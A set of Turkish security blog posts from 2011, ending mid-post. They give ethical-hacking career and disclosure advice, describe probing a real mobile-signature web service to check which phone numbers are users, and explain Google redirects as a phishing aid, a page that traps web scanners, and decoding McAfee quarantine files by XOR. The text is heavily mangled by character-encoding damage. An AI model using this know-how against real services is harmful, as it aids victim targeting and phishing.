bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile 